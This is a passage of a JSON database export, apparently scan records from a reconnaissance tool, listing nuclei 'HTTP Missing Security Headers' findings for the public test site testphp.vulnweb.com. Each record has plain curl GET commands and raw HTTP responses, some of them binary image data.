en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 859, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:42:14.231Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 860, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:42:14.419Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 861, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3", + "discovered_date": "2024-11-13T02:42:14.604Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 862, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "discovered_date": "2024-11-13T02:42:14.783Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/4.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4615\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:58 GMT\r\nEtag: "4dca64a1-1207"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0002\u0003\u0001\u0001\u0001\u0001\u0004\u0005\u0003\u0006\u0002\u0001\u0007\b��5\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0005\u0002\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0004\u0012!\u00051A\u0013Q\u0006"aq�\u0014�#2B��R��%3���b��\u001a\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0002\u0005\u0004\u0006��0\u0011\u0002\u0002\u0001\u0003\u0001\u0006\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0012!1A\u0004\u0013"2Qq\u0005a���3��\u0014#Rb����\f\u0003\u0001\u0002\u0011\u0003\u0011?K4�5���\u001d�Ô\u0012I�?�#Y6��^�s`\u001f��# 2�#Ag��&V\u0016\u000f���:����'���02t��>\u001cnX3P�W��s��D�-���#�&8�3���q�\u0011�A�4\t�����0+���F�!�4�"��#�)c�\u0002�\u001b�zTZ��Wo\u0015�<s\r��\u00159D��&�\tRտ��\u000b�kZ$�������Z��>�{�rB�2�]�U]�wy \u001f\u001d���\u0010~�\r\u0006�K��ۊ�k�~����8\u000f��~fI\t\u001b�\u0015D\u001e���\u001d<�+\u0014(�v\u0002�j\u0003�?(Xi�|��RZ\u001e�C��o�.\u001e)w ! 3n\u000b�\u0013E���agU˔#BX�\u0002����=M���\u001a�}�\u0006�\u0002�=��\u001c��ca̭I���!�\u0003�N�Y�\u0019�0UdK��\b'��U����m��^>�Q��\u0012*��Q�\u000f\u001ac\u001c�\u0005�F���*�\\�4����ՆP\u0007<~t��U\u0014�2�<�gz��\u000f$Y���e�\u0006�?3\u0003�\n<v���X\u000e`U,p&�7�C\u0017�cW\u0006hP3/��[=�?�f\u001aL���"��ʑ��r�,�\u0015�*�\b.�"�$�\u0016{�\u0018="l����v��l�<�U#��I�r�x��ֶ�/�A�\u0015�C� BĒhj�-�g����\u0007�Г4���CL�\u0018\b��(�h�\u000by\u001c�B�\u0017�f&<pƱ�\u001a�(��(\u0001�5\\*\u0005\n�q�:��\u001bE\u0016&\\�����Q�\u0013�utg��}����\u0003��\u0019?��\t\u0014��@�\u001e,�����鼓n]/���U܄���Z\u0007��:[�ԃdK\u0004��e'bHl���s]������:\u000e�\u001c�ގ�9�?��U\u0010�)���:�\u0003+P\u0004��aF�X�<\u001b≩��0A��\u0003��X]O!�\u001a\u0003���A�H����6���{\u001f�T6�Ǭgvl�\u001e�[���X\u001c����\u0007=���o�M��/}f����W�\bn��8���\u0016"I�/A\u001b\u0005�������<��uy"R�ŀ���������\n\u001cԺ�t���,孨\u0011�P�A�\r��\u001a+3;ч��F;T{��[�����\u0016�V�6�uL��e��\nۈ,YX���?��N:.*b@����Q5}�������\u0007Ցi��}�������\n;��ד�h��/�Ӂ���9hw\u001f[���\\\\92_w��\u0010��\u0018�\u000b��\u001f�'��w3��8\u0001Yop\u0006ڂ�l�+C���:��r�t`zLV�A�|\u001f�\u0003��\u0002;\u0017�D�mm���\f̾���@�B7)��2�H��Ǜ�\\\u0011VF�};�'��L*@ۈV4O�ߑu��p1��ُ\u0018E�hw>��?]<��\u001fM\u0010�L�f�Sa\fƌ\n}t|_���15F����\u000e�\u0015\u000fSD\u001d^�\\��\t(\u001cX�j�:�:�\f�\u0018�y\u0007]�\u001fm#��`��S#*\b�@f\u000e�\u0015_sΪ\u001dy^L��\t�1Ŵ���k�7|7\u0015|}E���#3�#29�r8`{Q�΢\u000f�!�F$e۸�\u0018Ճ��<w\u0014k��uFN\u0013㱓\r�Ѱ��\u001d��·l�U&�r=��GϿ���ͦ�4�:�9�C���O��\u0015Z\u0012|�\\�$�\u0016b\u0015bI \n\u001c���^uT��f!��!�V��Uoɮkށ5�\u001e�\t�W�3(,�~`�F������k,���o4��r80����3��7Uλ���\u0015\u0001��;�\u001et�ى�����\b>ڂ^E����M�����@\u001as�=ŘC�\u0001�(�p�˘ϐ���)��"�<�0�z�7ȡ����yI\u0004b��{��8c��s=%A�&h�u�-�\u0001���3��f�\u0011���k�#��\b\u001d�滊҈D��z��+���O��cP\u0007a�x\u001fm<3Y��g�%\u001b�������"a,�|���k\u001e\u0001�kM�\u0015h\u000eݴ�\u0019UG}^z�\u0011r�(\u001e�k���\u0014N&f���4p����`<��.\u000f�Rf\u000b\u001cr��LE��\u0004w�a�\u0013;�d�$X�\u0018�o�($���A\u001e���\\���t��[��q'P�\u0014/,����I�\u001a\u001e_�q��#74I`E-{�?��F�\u0011|?��\u001eJL\u0015\f��.@!d\u0003�\u0006���oO��me��t��1���8 �5�>��~u\u0001c�B�93����pS\u0019\b���\u0003nu䊢;P����S'&N��2"���\u0006W��G�<��\u0011‚ǎIZ�l?��\u000f\u001b\u0010�\u0005YV�c\fB�\u0015��\u001am�Ӡ�%H�DU�ÿ���\r$�dր�D��bu\u0003�,�2\u001c��匨X���!,�\u0018�\u0017d\u0011\\�\u001ac��\u001b����dIe�(\u001fP�IT�qUVŅ�<\u000f�:�E\n�8�H�x�Um+�\u0006֟���p�_P�'�#��\u001a\u0007*e�9\u0004r\u0015\u000e�[k0��}�P~�L�V'\u00042���<��A�v��H}x��\u0013_�����\u0019L�B��X��B\u0014\u0005RV@K\u0012�KpG�\u000bDrh��3ʞN�xZ�����\u0006��VyY�o�w\u0010\u0016��\u001a�\u0011L�"���\u0005\u0004�s��s�>�y�m6���8��K0�"X��[Q�\u0016\u000bE�$�#q�g�\u001ck±�Ħ�*�һ�\fy#m\u000e,7�6\u0001��}#�\u001c���,����U��6ڀ���FGs��8\u001bZ�Zڋ�t�\u0017�,�\u001a��z�Wj7���UR��s@�\u000e\u0015\u0012\f�A�j����\u0013,H;�%\n��\u0016,_o���^��]�0�G�6��\u0014�n�\u001d�:�*_\\��1y�|��\u0004aM�v�F�B�_j��(�\u0006��o^���\\\r�����23\u001e�e�\u001d\u0013p\u0004�\u0004�\u0007�<\u000f�\u001a�3�$\u0003���\u0007��m\u0005�\u001cKF�>羝c\u0015\u0015ڵ���'\u0013\u001e��v\\�� �͖�䊾�(�<��8}\u000e\u0012�g&m����#��\u001f�����u��4Ǒx�N\u0015/]�s��\u000e�ohN/O�y1!n9e��7�\u0018�(�\u0006�Ǖ}��a\f����\u0004��a\n\u0001㶎�@ \u001f���ƍ��\u0007Τ���\u0017�\u0010@�18��\u001d\u0017\u001bX\u001e�BH\\c������܂4B\u001e~�\\։\u0004��?MP��I\r��ݹ��z���I� wfc�\u0015\u0014Y��@{\u0001��4ר.Yp�4E\n#�V$|�\u001bo4l]\u001e;���̼KT2wT��\u0013�\u001b?1���\u001e\u0007�IuR<+7������!{\u0010O�\u0013\u000e�3Y\u0016D�cb\u0003�a[�\u0018X\u0006��\u0001�ڹ\u00122[a�\u0007������\u000e\\,eґAU!@�߸\u001c�7ި{k\u000f��}Y����٢�\f\u0018ϰ|\u000f��_\u000f┃\u001f�ފ%\rD_'r��\u0004W\u0017ߛ�1�\u001bu\u0015�̝�(��]�T\u0016�l��Ln��\u0015Wܒöc#v8�9m\\��\u001bQ�Bֈ�]��^�9\u0001�.ϕ���N�ş��ן���l�&����p72��ܮ\t\u001f�T��n;\\M\u0005&�er�\u0006�E�n�Q<v<X44:\u0002Ɖ�{��h�@G��U��Q���1�O�Y�u��0ر\u0016p7\u001d���^O���������^�WƂ�,�N�N��I�L�:�%\t��������d\t�\fL���P�\u001d\u0016\u001c�#\r1eC`m\u000bb��U���ǁE&&zez���\u0018(P�[�\u001b6�7F����p5~\u0014��\u0001FR=��|`\rk�T��e�h�>/�H�}Y\\��qH�G�\u0001~/p�o����&���\u001a)V4�\u0004J�\u000e��\u0018�E\n<��^�ֆ\b�\u0003�\u001d\f �����̯~O L�?W��#�VV�f�dJ2P;��;�U\n�Y���:�x\u001d>6�7�-��V2ށ,F�7\u000f��أ}�j#�R;\r\\�>\u0016]�1�p<��>�w��1\f\u001f\u0015��4%�\u001e�V(��捀A\u0006��{���\u001f�P�\u000e>T�\u0015�r\u0002:�b�\u00057`\u001e\t����ӡb��#GUz�\u000e�h\n\u0003m�\u0001�@d�\u001b�4\u00016��x�<J\u0002�c�)a`\u001a&�w��\t\u0001����~ M�n�u����3�{\u001a\u0004�{���Lq��,��\\�\t��SI�S{\u001b�G�\u000f���|;!�\u0010���&r.�*�T[\u000e~m�h_��F�\u001d\u0003��VwM��9�I�4��ƕ\u0003!<w#m��}��\u0016\u000eO"@�zϞ�<p#3��)=\\�\tP���[���0�!\f��#J״�`S�<|��W�1�ۜ�H",h*�:S)}��u�b�p����D#\u0001{�\u001a��B�\u0006�;��4X�\u000b~M\u0002k�\u000e�?O���6@BѻF�\u001c:�5`�D\u001a���m\u0005�\n�H��\u0003w\u0002�����bj\\�\u0007��t��]���x�Z3HСD%����T�\u0017B�\u001e��v��\u0002��[�B>cc�u�P�|���˃d����\u0015����\u0016@;\u001et���I q���\u001c|���J���CL��1�%@�B��\b\u0004�5�\u001b\u0017V<�8��#�Q\u001364�E#Fɹ\u0018���k\u000e<\u0010H#�$jΒޤ~���S�������Z�:\u000f\u001d'5����zs;�Ӥ��6�\r\u0015$i�⤠nE?q���sK\u0019h\u0018�( �5d]_﫺fw�L\u0019$�k�G�\\��ЧO��m�1�����\u000e��H���\n��x\u0004]�}���<���$0ώ��\u0010�B7314\u0015Tr����c�j���\u001aJ�]A\u0017tG�\u0007L����s�嶰g�8��W\u001f"F�\\\t\u0013�S��_c�:���GYy�\u0002z��\u0011;U���\u0001I��]�w�گ�d�t��Xs\u001d�fW��\u001c���x\u0004X�/�W����D\u0005\u0015�C7�U����p+β]\u001b�<l�}Rޒ\u000b�C]�\u0007����@�bN�"20e"�\u0006�\u001a� �\u0014�T��\u0011�>8�\b�����������Q��\u0010N�;�\u001a�b\u0007ƺQgV��^5�e�B\u0004��Ƞ\u001e5��$�Ա�؟I�\u0012\u0001�������u�_���\u001d��~�\u0018Ѫ��Ҝh���1�A\u0013�\u001bA�����/����_�U�cV��\u0007�m_�\u00188S�@����SSUn\u001b��p>Oβ�\u0001���3�\u000fU����\ba�\\��SSV>E�J�����,u\u0006���:�\u001cO\u0003�\u00048B������Ӝef}$�\u0006=e�\tf˗��Z�m���ε���\u001a��)�\u0010\\1a\u0002\u001f\u0012�;k��\u0018��\b�����ՌX�ez�\u0004\u0011u���������=F\u0006�,\u001d��\u0004�菅sr'N�,�10亠�Ty�ۏmMM$y�='[oW��3W��T��}'\u001f+$ ��$( p�{�5���ښ�a�r�&\u0018�ͫ�󩩮\u000ba\u0013��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 863, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/1", + "discovered_date": "2024-11-13T02:42:14.958Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 864, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "discovered_date": "2024-11-13T02:42:15.148Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/3.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3725\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-e8d"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0004\u0003\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b��2\u0010\u0002\u0001\u0003\u0003\u0003\u0003\u0003\u0003\u0003\u0004\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061A\u0013"Q\u00142a\u0007q�\u0015B�\b\u0016#3C����\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0003\u0005\u0006\u0007\u0001\u0004��2\u0011\u0001\u0003\u0003\u0002\u0003\u0005\u0007\u0004\u0003\u0001\u0002\u0003\u0004\u00111\u0005!\u0012\u0013A\u0014Qaq�\u0006"#����2���3R���\f\u0003\u0001\u0002\u0011\u0003\u0011?��W�z�M.�wow\n�C$\u0012��\u001b�2\t�\u0004\u001f��V���\u0013u\u001b;6���Ŏp6�I�l<����I$�\r���xU�/E�]���\u001b\u0018\u0002�\u0010I�8\u0002�_A��\u001f\t;7�^�J��\u0013^\u0006��MB��N�M�]�k\u001b0Ei�\b\u0019���54R$��\u001c�b��\u001c�����V�}���&�ng�\u001at���\u0010�V^�\u001eB7���܌��\u000b�д\u000bk\u0013!���#\u001a��\u001f��\u0017�\u0018��@\u001cq��x��C��2Xn����^W��9��,\u001a=J�\r\u0015��[�V��N�n./u\u0012�\\Or-�F���\u000b�\t����v\u001cg<F*\u0012��JYLR\rǟ�KST����E\u0014Q^e��c\f\u001aJy\u0019�+�\\�t8&�JF)+�h��(B(��\u0010�F))�)���M�QE\u0014%-#���<u|�q��,�\u000e\u0016(W�.�� �(9��!N\f̀�\u001d\u0002H����1��#��j�]��6\u001a��픆+�w\u0012D�\u0003�����G��u=\u000b�r�!D�4��p�5�\r��\n6����\u000eq��\u0003�6��h���ψq\u001e�\u001f�UA�k�J8/a��wS�6�\u0010�\u0015\u0002M�㴞\b����|V\u0011\u0014*\r�\u0011K���Υ�b�\u001a�����\u0015\u001c"�\u001c��\u0005\u0001�)9�\u0004\u00023��\u0003Vnt����,��\u0018\f�,�����\b����;�T\u0018#4�\u0003��$_��Lj�s\u001fτ�\u0003�5F�e}^�錛�˹Q�ܟݸn\\�2pI�\u000e\u0018��p�A\u001bD�$c+�\u001bP�\u000e�r�}�ی�2@�+E�X��l��I$�\\͈�1�\u0018.�\u0005���\u001cs�c\u0007�n�\u001f�\u0012K�Y�\u0017��\u000eO�6\u0001 \u0012pH\u001cx�5\u0013�hkj�����^�\u0003�і4�T��\u0019쥺{�B[�=�<\n\u0010 �\u001d�m9ov�y�\u0003�;�[Qm+�fԯ`\u0002HmIJB�\u0002\u0015����\u0001��8���\u00157�w���RH�/��nTz��\t��;C�\u000f\u0019\u0007;\\�����Ҽ��29\u0006H\u001bm�:)��{\u0014%�w��4\u000f�{�R�K\u001b�)R{���KA��y\u0019U)�� n%�p2ɮ���4gP�@%Cn�|���s\u001e���=\u0002���L�wH���\u0005Q���B�\u001carX�[�\u0018�^X�Z��\u000fy�R���n\u001e�\nѤ��$3����.s�d`�\r�U�\u0004��\u0011�1����\u000b�|�T\r\u000e���#��zӲ��dRm��-. �����x�`q��7WW�\u0019\u0004py�KTw���\u0015k�^&�\u0014dc�\u0015!\u0019�L#\u0014�\u0013�u�QE\u0015ĤS[�:���Rٔ�QEq8��\u0010x�>�\u0016ݣv{�J����wY\u000b��E@op\u0007\u001f4G4��,���J����YO��G�J�u1�p�\u0016�������:�]Һ��P����+i\u000b<\u0013�;�\u0002\n����c������2\u000b��m6+�\u0016�\u0019��\u0006H��2�\u0006�\u0002�\u0005H�H'#\f8��f�w��t���t�7���`��Z\u0003�����x\u0004�\f�q���ƈ+�|f�\u001e�R��@w����>$�2����h��P\u0010v��\u00078� \u000e\u000f\u001c5c���x`\u0019&\u0017b_�y \f\u00021�ry>\u0006\u0001���L~�麪J���:X��\u0018�2����l(,s�q��8�ߤ���^�]\t��\u0005e�\u0010\u0006��;�a�\u001d��L��g\u0015V��梮��45����c�u3Y<U\u0014�\u0010�\\G��(��\u0004S.S�v�)]�8?�T���U��6�g;U\u0007���\u0007�p+Ch?��eN�͂�z\\[\u000b\tV�=1\u0011f!��\u0018݁��+��O\u0003�\u0006Z����els\u001cq�����}�\u0003\u0005����\u0005\fFv��S�\u001dr�D��9��k���O\u0004!w˳n�\u0016*�\u0001��\u001d��\u0003�U5�uN�6�&�B�{i�h���e)\u0018dS��\u001e\t\u0019�\u00185\u001eA\u001b/{\\\u000e�EE<�0�\u001aE��������Er�a�$�\u0018���.�\u0015��(��u�$`\r7a��B\u0001MU\u0002�{=-�}�5^�q�(\\7)�3Y�#�5-\u001e?B�oRɑ����z���I]��;�v���TG����9��#A\u001e)��|f�6+���z]�\u0015�ݴ��͆��FSϴ��mĀ�\n\u0014}ÀvΐV��$��E��\b\u001d�d�z{�l0���A�\u0018\r��+�S�\u0015���̈:;U�\u0018��o�C\u001e��\fH\u0014�9�nq��\u001a��\\�Z\u0007�<c�\u001f\u001f�{�c\u0012�\u001er�\u001d�P�@��E\u001c��+�W�k�^?\u0004\u000f��S��M�\u00078=����Hc�y�� S#���\t��o�{)$g 